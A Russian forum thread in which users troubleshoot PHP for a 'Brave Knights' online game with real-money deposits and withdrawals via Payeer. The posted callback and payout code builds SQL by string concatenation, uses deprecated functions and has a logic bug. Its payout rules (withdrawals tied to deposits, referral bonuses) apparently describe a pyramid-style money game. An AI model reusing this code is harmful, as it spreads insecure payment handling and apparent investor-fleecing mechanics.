Автор Тема: Brave Knights - Скрипт игры с выводом денег  (Прочитано 1882 раз)

0 Пользователей и 1 Гость просматривают эту тему.

kvozimir

  • снова в skype --> kvozimir
  • *
  • Оффлайн
  • Награды Репутация  более 25 Более 1500 сообщений Более 2 лет на форуме Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 26
  • Сообщений: 1630
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +27/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Brave Knights - Скрипт игры с выводом денег
« Ответ #15 : 01 Апрель 2018, 15:52:59 »
Нет оценки
нашел подобную игру смотрел там мерчант тоже самое  :tongue:

Добавлено сообщение: 01 Апрель 2018, 14:15:20
скорее всего что то с бд а я с ней не особо понимаю
1. откуда скачал скрипт?
2. не нужно с подобной,нужно с обычной стандартной

 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #16 : 01 Апрель 2018, 15:59:54 »
Нет оценки
 1. откуда скачал скрипт?
2. не нужно с подобной,нужно с обычной стандартной
давно уже качал не помню могу сюда архив закинуть если можно
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • Оффлайн
  • Награды Репутация  более 25 Более 1500 сообщений Более 2 лет на форуме Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 26
  • Сообщений: 1630
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +27/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Brave Knights - Скрипт игры с выводом денег
« Ответ #17 : 01 Апрель 2018, 16:06:34 »
Нет оценки
давно уже качал не помню могу сюда архив закинуть если можно
ну я не знаю попробуй выложи,скрипт то и так в теме есть....но на вряд-ли будет толк попробуй мерчант со стандартного скрипта взять не поможет будем дальше искать проблему
 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #18 : 01 Апрель 2018, 16:33:39 »
Нет оценки
<?PHP

# Автоподгрузка классов
function __autoload($name){ include("classes/_class.".$name.".php");}

# Класс конфига
$config = new config;

# Функции
$func = new func;

# База данных
$db = new db($config->HostDB, $config->UserDB, $config->PassDB, $config->BaseDB);



$pref = $config->BasePrefix;


     
   
   
if (isset($_POST["m_operation_id"]) && isset($_POST["m_sign"]))
{
   $m_key = $config->secretW;
   $arHash = array($_POST['m_operation_id'],
         $_POST['m_operation_ps'],
         $_POST['m_operation_date'],
         $_POST['m_operation_pay_date'],
         $_POST['m_shop'],
         $_POST['m_orderid'],
         $_POST['m_amount'],
         $_POST['m_curr'],
         $_POST['m_desc'],
         $_POST['m_status'],
         $m_key);
   
   $sign_hash = strtoupper(hash('sha256', implode(":", $arHash)));
   if ($_POST["m_sign"] == $sign_hash && $_POST['m_status'] == "success")
   {
     
   $db->Query("SELECT * FROM ".$pref."_payeer_insert WHERE id = '".intval($_POST['m_orderid'])."'");
   if($db->NumRows() == 0){ echo $_POST['m_orderid']."|error"; exit;}
   
   $payeer_row = $db->FetchArray();
   if($payeer_row["status"] > 0){ echo $_POST['m_orderid']."|success"; exit;}
   
   
   if($_POST['m_amount'] != $payeer_row["sum"]) { echo $_POST['m_orderid']."|success"; exit;}
   
   $db->Query("UPDATE ".$pref."_payeer_insert SET status = '1' WHERE id = '".intval($_POST['m_orderid'])."'");
   
   $ik_payment_amount = $payeer_row["sum"];
   $user_id = $payeer_row["user_id"];
   
   # Настройки
   $db->Query("SELECT * FROM ".$pref."_config WHERE id = '1' LIMIT 1");
   $sonfig_site = $db->FetchArray();
   
$db->Query("SELECT user, referer_id FROM ".$pref."_users_a WHERE id = '{$user_id}' LIMIT 1");
   $user_ardata = $db->FetchArray();
   $user_name = $user_ardata["user"];
   $refid = $user_ardata["referer_id"];
   
   # Зачисляем баланс
   $serebro = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   
   $db->Query("SELECT insert_sum FROM ".$pref."_users_b WHERE id = '{$user_id}' LIMIT 1");
   $ins_sum = $db->FetchRow();
   
   $serebro = intval($ins_sum <= 0.01) ? ($serebro + ($serebro * 0.50) ) : $serebro;
   $add_tree = ( $ik_payment_amount >= 499.99) ? 2 : 0;
   $lsb = time();
   $to_referer = ($ik_payment_amount * 0.10)*100;
 

   
   //Credit
   $db->Query("SELECT * FROM ".$pref."_users_b WHERE id = '{$user_id}'");
   $cr = $db->FetchArray();
   if($cr['credit'] == 0) {
   $db->Query("UPDATE ".$pref."_users_b SET money_b = money_b + '$serebro',  to_referer = to_referer + '$to_referer', last_sbor = '$lsb', insert_sum = insert_sum + '$ik_payment_amount' WHERE id = '{$user_id}'");
   } else {
   $money  = sprintf("%.4f", floatval($sonfig_site["ser_per_wmr"] * $ik_payment_amount) );
   if($cr['credit'] < $money) {
   $mon = $money - $cr['credit'];
   $mone = $money - $mon;
   
   }else{
   $mone = $money;
   }
   $db->Query("UPDATE ".$pref."_users_b SET money_b = money_b + '$mon', to_referer = to_referer + '$to_referer', insert_sum = insert_sum + '$ik_payment_amount', credit = credit - '$mone' WHERE id = '{$user_id}'");
   }
   
  // echo $bill;
   
   # Зачисляем средства рефереру и дерево
   $add_tree_referer = ($ins_sum <= 0.01) ? ", a_t = a_t + 0" : "";
   $db->Query("UPDATE ".$pref."_users_b SET money_b = money_b + $to_referer, from_referals = from_referals + '$to_referer' {$add_tree_referer} WHERE id = '$refid'");
   
   # Статистика пополнений
   $da = time();
   $dd = $da + 60*60*24*15;
   $db->Query("INSERT INTO ".$pref."_insert_money (user, user_id, money, serebro, date_add, date_del)
   VALUES ('$user_name','$user_id','$ik_payment_amount','$serebro','$da','$dd')");
   
   # Конкурс
$competition = new competition($db);
$competition->UpdatePoints($user_id, $ik_payment_amount);
#--------
   
   # Обновление статистики сайта
   $db->Query("UPDATE ".$pref."_stats SET all_insert = all_insert + '$ik_payment_amount' WHERE id = '2'");
   
 
   
   
   
   $db->Query("UPDATE ".$pref."_users_b SET a_t = a_t + '$a_t', b_t = b_t + '$b_t', c_t = c_t + '$c_t', d_t = d_t + '$d_t', e_t = e_t + '$e_t',
   last_sbor = '$lsb' WHERE id = '{$user_id}'");
   
   echo $_POST['m_orderid']."|success";
   exit;
   
   
   }
   echo $_POST['m_orderid']."|error";
}
?>

http://svalka58.ru/index.php?topic=3079.15
 

shans5

  • *
  • *
  • Оффлайн
  • Награды Репутация  более 25 Более 500 созданных тем Более 2500 сообщений Более 2 лет на форуме Бывает груб к участникам форума. За время в онлайне на форуме
  • Дата регистрации: Сен 2015
  • Расположение: Регион 58
  • Возраст: 38
  • Сообщений: 2923
  • Страна: ru
  • Поблагодарили: 261 раз(а)
  • Репутация +41/-4
  • Пол: Мужской
  • Всё только начинается !!!
  • Дата рождения:1979-06-30
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #19 : 01 Апрель 2018, 17:50:14 »
Нет оценки
http://svalka58.ru/my_img/img/2018/02/04/88842.png
Brave Knights - Скрипт игры с выводом денег
Подвергнуть критике, может любой.
Создать то,что будет подвергнуто критике,дано не каждому.

 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #20 : 01 Апрель 2018, 23:11:22 »
Нет оценки
исправил
 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #21 : 05 Май 2018, 21:17:46 »
Нет оценки
теперь беда с выплатами полуавтамат работает а вот автомат не хочет  что то тут не то
<div class="block1
"><div class="h-title1
">Заказ выплаты</div></div>

<div class="block2">
<div class="some-content-related-div">
<div id="inner-content-div">
<br>
<?PHP
$_OPTIMIZATION["title"] = "Аккаунт - Заказ выплаты";
$usid = $_SESSION["user_id"];
$usname = $_SESSION["user"];

$db->Query("SELECT * FROM ".$pref."_users_b WHERE id = '$usid' LIMIT 1");
$user_data = $db->FetchArray();

$db->Query("SELECT * FROM ".$pref."_users_a WHERE id = '$usid' LIMIT 1");
$user_dataa = $db->FetchArray();

$db->Query("SELECT * FROM ".$pref."_config WHERE id = '1' LIMIT 1");
$sonfig_site = $db->FetchArray();

$status_array = array( 0 => "Проверяется", 1 => "Выплачивается", 2 => "Отменена", 3 => "Выплачено");

if($cfg['auto'] == 1) {
   
?>
<center><b><font color="red">Технические работы до 03.03.2016 в 00:00</font></b></center><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
<center> <img src="/img/Payeer1.gif"> </center>
<center> Минимальная сумма вывода - 0.50 руб<BR /><BR />
<hr>
<center><b>Выплаты осуществляются в автоматическом режиме и только на платежную систему PAYEER! Процент при выводе составляет 0%</b> <BR /><BR />
<b>Из платежной системы Payeer Вы можете вывести свои средства в автоматическом режиме на все известные платежные системы и международные банки.</b><BR /><BR /></center>
<center><b>Ссылки на учебные материалы:</b><BR />
 - <a href="https://payeer.com/?partner=1840679" target="_blank">Создание счета в Payeer</a> <BR />
 - <a href="https://payeer.com/?partner=1840679" target="_blank">Вывод средств из payeer</a> <BR /></center><BR />

<?PHP
   
   # Заносим выплату
   if(isset($_POST["sum"])){
      $purse = $user_dataa['purse'];
      //$purse = $func->ViewPurse($_POST["purse"]);
      $sum = intval($_POST["sum"]);
      $val = "RUB";
      
      if(!empty($purse)){
         
         $proc_pay = $user_data["insert_sum"] + ($user_data["insert_sum"] * 0.5);
            $pay_sum = ($proc_pay - $user_data["payment_sum"]);
            if(($sum/$sonfig_site["ser_per_wmr"]) <= $pay_sum){
            
               if($sum >= $minPay){
            
                  if($sum <= $user_data["money_p"]){
                  
                     # Проверяем на существующие заявки
                     $db->Query("SELECT COUNT(*) FROM ".$pref."_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
                     if($db->FetchRow() == 0){
                        
                        
                        ### Делаем выплату ###   
                        $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
                        if ($payeer->isAuth())
                        {
                        
                           $arBalance = $payeer->getBalance();
                           if($arBalance["auth_error"] == 0)
                           {
                           
                              $sum_pay = round( ($sum / $sonfig_site["ser_per_wmr"]), 2);
                              
                              $balance = $arBalance["balance"]["RUB"]["DOSTUPNO"];
                              if( ($balance) >= ($sum_pay+1)){
                           
                              
                              
                              $arTransfer = $payeer->transfer(array(
                              'curIn' => 'RUB', // счет списания
                              'sum' => $sum_pay, // сумма получения
                              'curOut' => 'RUB', // валюта получения
                              'to' => $purse, // получатель (email)
                              //'to' => '+71112223344',  // получатель (телефон)
                              //'to' => 'P1000000',  // получатель (номер счета)
                              'comment' => iconv('windows-1251', 'utf-8', "Выплата пользователю {$usname} с проекта Brave-Knights.biz")
                              //'anonim' => 'Y', // анонимный перевод
                              //'protect' => 'Y', // протекция сделки
                              //'protectPeriod' => '3', // период протекции (от 1 до 30 дней)
                              //'protectCode' => '12345', // код протекции
                              ));
                              
                                 if (!empty($arTransfer["historyId"]))
                                 {   
                              
                              
                                    # Снимаем с пользователя
                                    $db->Query("UPDATE ".$pref."_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");
                                 
                                    # Вставляем запись в выплаты
                                    $da = time();
                                    $dd = $da + 60*60*24*15;
                                 
                                    $ppid = $arTransfer["historyId"];
                                 
                                    $db->Query("INSERT INTO ".$pref."_payment (user, user_id, purse, sum, valuta, serebro, payment_id, date_add, status)
                                    VALUES ('$usname','$usid','$purse','$sum_pay','RUB', '$sum','$ppid','".time()."', '3')");
                                 
                                    $db->Query("UPDATE ".$pref."_users_b SET payment_sum = payment_sum + '$sum_pay' WHERE id = '$usid'");
                                    $db->Query("UPDATE ".$pref."_stats SET all_payments = all_payments + '$sum_pay' WHERE id = '2'");
                                 
                                    echo "<center><font color = 'green'><b>Выплачено!</b></font></center><BR />";
                                 
                                 }
                                 else
                                 {
                              
                                    echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";   
                              
                                 }
                           
                           
                              }else echo "<center><font color = 'red'><b>Внутреняя ошибка - сообщите о ней администратору!</b></font></center><BR />";
                           
                           }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";
                        
                        }else echo "<center><font color = 'red'><b>Не удалось выплатить! Попробуйте позже</b></font></center><BR />";
                     
                        
                     }else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center><BR />";
                     
                  
                  }else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";
            
               }else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты составляет {$minPay} серебра!</font></b></center><BR />";
               
         }else echo "Максимальная разрешенная сумма на вывод для вас составляет  {$proc_pay} руб.!";
      
      }else echo "<center><b><font color = 'red'>Кошелек Payeer указан неверно! Смотрите образец!</font></b></center><BR />";
      
   }
?>

<center><b><font color="red">Перед выплатой укажите свой номер кошелька в настройках!</font></b></center><br />

<center><b><font color="red">Сумма вывода зависит от суммы вашего поплнения!<p> А именно +50% от суммы пополнения</font></b></center><br />

<form action="" method="post">
<table width="99%" border="0" align="center">
  <tr>
    <td><font color="#000;">Ваш кошелек</font>: </td>
   <td><b><?=$user_dataa["purse"]; ?></b></td>
  </tr>
  <tr>
    <td><font color="#000;">Отдаете золота для вывода</font> [Мин. <span id="res_min"></span>]<font color="#000;">:</font> </td>
   <td><input type="text" name="sum" id="sum" value="<?=round($user_data["money_p"]); ?>" size="15" onkeyup="PaymentSum();" /></td>
  </tr>
  <tr>
    <td><font color="#000;">Получаете <span id="res_val"></span></font><font color="#000;">:</font> </td>
   <td>
   <input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
   <input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="min_sum_RUB" value="0.5" disabled="disabled"/>
   <input type="hidden" name="val_type" id="val_type" value="RUB" />
   </td>
  </tr>
  <br>
  <tr>
    <td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; radius:10px; margin-top: 0px;" class="btn_8" /></td>
  </tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>

<? } else { ?>
<?
# Список платежек
if(!isset($_GET["pay_id"])){

   if(isset($_POST["sys_pay"])){ Header("Location: /account/payment/".$_POST["sys_pay"]); return; }
   
   
   $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
   if (!$payeer->isAuth())
   {
      echo '<center><font color = "red">Выплаты временно недоступны! Обратитесь к администратору!</font></center></div>
<div class="block3"></div>
<div class="clr"></div>'; return;
   }
   
   # Платежные системы
   $arPs = $payeer->getPaySystems();
   $systems_array = $arPs["list"];
   ?>
   <form action="" method="POST">
   <center>Укажите более подходящую для Вас платежную систему из списка имеющихся. <BR /><BR />
      <select name="sys_pay" style="padding:3px;">
      <?PHP
         
         
         foreach($systems_array as $key => $value){
         
            ?><option value="<?=$value["id"]; ?>"><?=iconv('utf-8', 'windows-1251', $value["name"]); ?> [Валюты: <?=implode(", ",$value["currencies"])?>]</option><?PHP
         
         }
         
      ?>
      </select>
      <BR /><BR />
      <input type="submit" value="Выбрать" class="btn_8"/>
   </center>      
   </form>
   </div>
<div class="block3"></div>
<div class="clr"></div>      
   <?PHP
   
return;
}else{

   $pay_id = intval($_GET["pay_id"]);
   
   $payeer = new rfs_payeer($config->AccountNumber, $config->apiId, $config->apiKey);
   if (!$payeer->isAuth())
   {
      echo '<center><font color = "red">Выплаты временно недоступны! Обратитесь к администратору!</font></center></div>
<div class="block3"></div>
<div class="clr"></div>'; return;
   }
   
   $currentSystem = $payeer->PaySystemData($pay_id);
   
   if(!$currentSystem) {echo '<center><font color = "red">Внутренняя ошибка! Платежная система не найдена, обратитесь к администратору</font></center></div>
<div class="block3"></div>
<div class="clr"></div>'; return;}
   
   $current_sys_name = $currentSystem["name"];
?>

<center><b><font color = "#914A1F"><?=iconv('utf-8', 'windows-1251', $current_sys_name); ?></font></b></center><BR />
<?PHP

if(count($currentSystem["gate_commission"]) > 0){
   
   if($currentSystem["gate_commission_min"]["RUB"] > 1 OR $currentSystem["gate_commission_min"]["USD"] > 1 OR $currentSystem["gate_commission_min"]["EUR"] > 1){
      
      echo '<center><font color = "red">Выплаты временно недоступны на указанную платежную систему</font></center></div>
<div class="block3"></div>
<div class="clr"></div>         
';
      
      return;
   
   }
   
   echo "Комиссия ".iconv('utf-8', 'windows-1251',$currentSystem["name"])." составляет: <BR />";
   
   $rub_min_str = "<BR />";
   if(isset($currentSystem["gate_commission"]["RUB"])) echo "RUB - ".$currentSystem["gate_commission"]["RUB"].$rub_min_str;
   
   $usd_min_str = "<BR />";
   if(isset($currentSystem["gate_commission"]["USD"])) echo "USD - ".$currentSystem["gate_commission"]["USD"].$usd_min_str;
   
   $eur_min_str = "<BR />";
   if(isset($currentSystem["gate_commission"]["EUR"])) echo "EUR - ".$currentSystem["gate_commission"]["EUR"].$eur_min_str;
   
   
}
   
   # Заглушки на минимальные выплаты
   function MinPaySystemRet($pay_id){
   
      switch($pay_id){
         
         case "184": return array("RUB" => "60", "USD" => "2", "EUR" => "2"); break; // WebMoney
         
         default: return array("RUB" => "2", "USD" => "0.2", "EUR" => "0.2"); break;
      
      }
   
   }
   
   echo "Комиссия проекта за выплату на данную платежную систему ".$currentSystem["commission_site_percent"]."%<BR />";

   $config_insert = $currentSystem["r_fields"]["ACCOUNT_NUMBER"];

   $array = array("RUB" => $sonfig_site["ser_per_wmr"], "USD" => $sonfig_site["ser_per_wmz"], "EUR" => $sonfig_site["ser_per_wme"]);
   
   foreach($currentSystem["currencies"] as $key => $value) echo "<font color='red'>{$array[$value]} серебра = 1{$value}</font><BR />";
   
   
   function ComissionWm($sum, $com_payee, $com_payysys){
      
      $a = round( ($com_payee/100)*$sum ,2);
      $b = round( (str_replace("%","",$com_payysys)/100)*$sum ,2);
      return $a+$b;
      
   }
   
   
   function ComissionWmReverce($sum, $com_payee, $com_payysys){
      
      $ret = round($sum/(1+($com_payee/100)+($com_payysys/100)),2);
      return $sum-$ret;
   }
   
   $mp_ar_f = MinPaySystemRet($pay_id);
   # Минималка для WMR
   $min_p_wmr = $mp_ar_f["RUB"] + ComissionWm($mp_ar_f["RUB"], $currentSystem["commission_site_percent"], $currentSystem["gate_commission"]["RUB"]);
   $min_p_wmz = $mp_ar_f["USD"] + ComissionWm($mp_ar_f["USD"], $currentSystem["commission_site_percent"], $currentSystem["gate_commission"]["USD"]);
   $min_p_wme = $mp_ar_f["EUR"] + ComissionWm($mp_ar_f["EUR"], $currentSystem["commission_site_percent"], $currentSystem["gate_commission"]["EUR"]);
   
   $min_ser_array = array(
                     "RUB" => ($min_p_wmr * $sonfig_site["ser_per_wmr"]),
                     "USD" => ($min_p_wmz * $sonfig_site["ser_per_wmz"]),
                     "EUR" => ($min_p_wme * $sonfig_site["ser_per_wme"]));
   
   function ExistVal($data, $current){
      
      $current = strtoupper($current);
      
      if($current == "RUB" OR $current == "USD" OR $current == "EUR"){
      
         return (in_array($current, $data)) ? $current : false;
      
      }else return false;
   
   }
   
   function SumPaymentSet($data, $current_val, $summa){
      
      $current = strtoupper($current_val);
      $sum = intval($summa);
      
      if($current == "RUB") return round( ($summa / $data["ser_per_wmr"]), 2);
      if($current == "USD") return round( ($summa / $data["ser_per_wmz"]), 2);
      if($current == "EUR") return round( ($summa / $data["ser_per_wme"]), 2);
      
   
   }



if($user_data['credit'] > 0) {
   echo '<center><font color="red">Вы не можете вывести средства так как на вас висит кредит в размере '.$user_data['credit'].' серебра, погасите кредит и сможете выводить средства</font></center>
   </div>
<div class="block3"></div>
<div class="clr"></div>         
</div>';
   return;
   }   


?>
<BR />

<?PHP

   # Заносим выплату
   if(isset($_POST["purse"])){
      
      
      
      $purse = (ereg(substr( substr($config_insert["reg_expr"], 1),0,-1), $_POST["purse"])) ? $_POST["purse"] : false;
      $sum = intval($_POST["sum"]);
      $val = ExistVal($currentSystem["currencies"], strval($_POST["val_type"]) );
      $min_serebra = $min_ser_array[$val];
                $maxPay = 10000;


      if($purse !== false){
      
                  if($sum < $maxPay){

                       
 

         if($val !== false){
         
            if($sum >= $min_serebra){
            
               if($sum <= $user_data["money_p"]){
                  
                        # Проверяем на существующие заявки
                        $db->Query("SELECT COUNT(*) FROM ".$pref."_payment WHERE user_id = '$usid' AND (status = '0' OR status = '1')");
                        if($db->FetchRow() == 0){
                     
                        # Снимаем с пользователя
                        $db->Query("UPDATE ".$pref."_users_b SET money_p = money_p - '$sum' WHERE id = '$usid'");
                        
                        # Вставляем запись в выплаты
                        $da = time();
                        $dd = $da + 60*60*24*15;
                        
                        $sum_money = SumPaymentSet($sonfig_site, $val, $sum);
                        $comission = ComissionWmReverce($sum_money, $currentSystem["commission_site_percent"], $currentSystem["gate_commission"][$val]);
                        
                        $db->Query("INSERT INTO ".$pref."_payment (user, user_id, purse, sum, comission, valuta, serebro, pay_sys, pay_sys_id, date_add)
                        VALUES ('$usname','$usid','$purse','$sum_money','$comission','$val', '$sum','$current_sys_name','$pay_id','".time()."')");
                        
                        
                        echo "<center><font color = '#914A1F'><b>Ваша заявка отправлена в очередь на выполнение</b></font></center><BR />";
                        
                        }else echo "<center><font color = 'red'><b>У вас имеются необработанные заявки. Дождитесь их выполнения.</b></font></center><BR />";
                     
                  
                  }else echo "<center><font color = 'red'><b>Вы указали больше, чем имеется на вашем счету</b></font></center><BR />";
            
            }else echo "<center><b><font color = 'red'>Минимальная сумма для выплаты в этой платежной системе {$min_serebra} Серебра!</font></b></center><BR />";
         
         }else echo "<center><b><font color = 'red'>Неверно указана валюта, у этой платежной системы нет такой валюты на вывод!</font></b></center><BR />";
      


}else echo "<center><b><font color = 'red'>Максимальная сумма для выплаты составляет {$maxPay} Серебра!</font></b></center><BR />";

      }else echo "<center><b><font color = 'red'>Платежный реквизит указан неверно! Смотрите образец!</font></b></center><BR />";
      
   }


?>

<form action="" method="post">
<table width="99%" border="0" align="center">
  <tr>
    <td><font color="#914A1F"><?=iconv('utf-8', 'windows-1251', $config_insert["name"]); ?> [Пример: <?=$config_insert["example"];?>]</font>: </td>
   <td><input type="text" name="purse" size="15"/></td>
  </tr>
  <tr>
    <td><font color="#914A1F">Валюта</font><font color="#000;">:</font> </td>
   <td>
      <select name="val_type" id="val_type" style="padding:3px;" onchange="SetVal();">
      <?PHP
         
         foreach($currentSystem["currencies"] as $key => $value) echo "<option value='{$value}'>$value</option>";
      
      ?>
      </select>
   </td>
  </tr>
  <tr>
    <td><font color="#914A1F">Отдаете Серебро для вывода</font> [Мин. <span id="res_min"></span>]<font color="#914A1F">:</font> </td>
   <td><input type="text" name="sum" id="sum" value="10000" size="15" onkeyup="PaymentSum();" /></td>
  </tr>
  <tr>
    <td><font color="#914A1F">Получаете <span id="res_val"></span></font> [Без учета комиссий]<font color="#914A1F">:</font> </td>
   <td>
   <input type="text" name="res" id="res_sum" value="0" size="15" disabled="disabled"/>
   <input type="hidden" name="per" id="RUB" value="<?=$sonfig_site["ser_per_wmr"]; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="USD" value="<?=$sonfig_site["ser_per_wmz"]; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="EUR" value="<?=$sonfig_site["ser_per_wme"]; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="min_sum_RUB" value="<?=$min_p_wmr; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="min_sum_USD" value="<?=$min_p_wmz; ?>" disabled="disabled"/>
   <input type="hidden" name="per" id="min_sum_EUR" value="<?=$min_p_wme; ?>" disabled="disabled"/>
   </td>
  </tr>
  <tr>
    <td colspan="2" align="center"><input type="submit" name="swap" value="Заказать выплату" style="height: 30px; margin-top:10px;" class="btn_8"/></td>
  </tr>
</table>
</form>
<script language="javascript">PaymentSum(); SetVal();</script>

<? }  }?>

<table cellpadding='3' cellspacing='0' border='0' bordercolor='#336633' align='center' width="99%">
  <tr>
    <td colspan="5" align="center"><h4>Последние 10 выплат</h4></td>
    </tr>
  <tr>
    <td align="center" class="m-tb">Серебро</td>
    <td align="center" class="m-tb">Получаете</td>
   <td align="center" class="m-tb">Кошелек</td>
   <td align="center" class="m-tb">Дата</td>
   <td align="center" class="m-tb">Статус</td>
  </tr>
  <?PHP
 
  $db->Query("SELECT * FROM ".$pref."_payment WHERE user_id = '$usid' ORDER BY id DESC LIMIT 20");
 
   if($db->NumRows() > 0){
 
        while($ref = $db->FetchArray()){
      
      ?>
      <tr class="htt">
          <td align="center"><?=$ref["serebro"]; ?></td>
          <td align="center"><?=sprintf("%.2f",$ref["sum"] - $ref["comission"]); ?> <?=$ref["valuta"]; ?></td>
          <td align="center"><?=$ref["purse"]; ?></td>
         <td align="center"><?=date("d.m.Y",$ref["date_add"]); ?></td>
          <td align="center"><?=$status_array[$ref["status"]]; ?></td>
        </tr>
      <?PHP
      
      }
 
   }else echo '<tr><td align="center" colspan="5">Нет записей</td></tr>'
 
  ?>

 
</table></div></div></div>
<div class="block3"></div>
<div class="clr"></div>   






 

maks161

  • *
  • *
  • Оффлайн
  • Награды Более 2 лет на форуме Репутация более 5 Более 1000 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 34
  • Сообщений: 1423
  • Страна: ru
  • Поблагодарили: 63 раз(а)
  • Репутация +14/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #22 : 05 Май 2018, 21:27:46 »
Нет оценки
что именно не работает. что пишет.
 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #23 : 05 Май 2018, 21:45:09 »
Нет оценки
не работают авто выплаты хотя все настроено скрин http://prntscr.com/je5r3d
 

maks161

  • *
  • *
  • Оффлайн
  • Награды Более 2 лет на форуме Репутация более 5 Более 1000 сообщений Благодарность от форума Более 50 созданных тем За время в онлайне на форуме
  • Дата регистрации: Янв 2016
  • Расположение: Ростов-на-Дону
  • Возраст: 34
  • Сообщений: 1423
  • Страна: ru
  • Поблагодарили: 63 раз(а)
  • Репутация +14/-5
  • Пол: Мужской
  • Дата рождения:1984-03-10
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #24 : 05 Май 2018, 22:19:03 »
Нет оценки
не работают авто выплаты хотя все настроено скрин http://prntscr.com/je5r3d
 пробуй файл менять на другой. проверь есть деньги на кошельке.
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • Оффлайн
  • Награды Репутация  более 25 Более 1500 сообщений Более 2 лет на форуме Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 26
  • Сообщений: 1630
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +27/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Brave Knights - Скрипт игры с выводом денег
« Ответ #25 : 06 Май 2018, 05:17:29 »
Нет оценки
так там ошибки вылезли и на скрине все видно

нужно указать кошелек первым делом...
настроить выплаты
а потом уже дальше пробовать выводить выводить на другой ( второй ) кошелек


 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #26 : 06 Май 2018, 10:52:26 »
Нет оценки
с платежками разобрался нашел еще косяк лоторея не пашет http://prntscr.com/jebxtj и чат как то криво но работает
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • Оффлайн
  • Награды Репутация  более 25 Более 1500 сообщений Более 2 лет на форуме Более 50 созданных тем Благодарность от форума За помощь пользователям За время в онлайне на форуме
  • Дата регистрации: Фев 2016
  • Возраст: 26
  • Сообщений: 1630
  • Страна: ru
  • Поблагодарили: 143 раз(а)
  • Репутация +27/-0
  • Пол: Мужской
  • telegram --> @kvozimir
  • Дата рождения:1992-04-18
    • Награды
  • Социальные сети:
    ВКонтакте
Brave Knights - Скрипт игры с выводом денег
« Ответ #27 : 06 Май 2018, 11:15:58 »
Нет оценки
ни чего не понятно по скрину..... подробнее объясняйте
 

Евгений

  • *
  • Оффлайн
  • Дата регистрации: Янв 2018
  • Сообщений: 18
  • Страна: ru
  • Репутация +0/-0
  • Пол: Мужской
    • Награды
Brave Knights - Скрипт игры с выводом денег
« Ответ #28 : 06 Май 2018, 11:38:48 »
Нет оценки
нет кнопки ставок должно быть вот так выглядеть http://prntscr.com/jec6fn подозреваю нету файла  в папке pages/ account нет файла lotterym.php  ^66&$ есть у кого этот файлик?
 

kvozimir

  • снова в skype --> kvozimir
  • *
  • Оффлайн
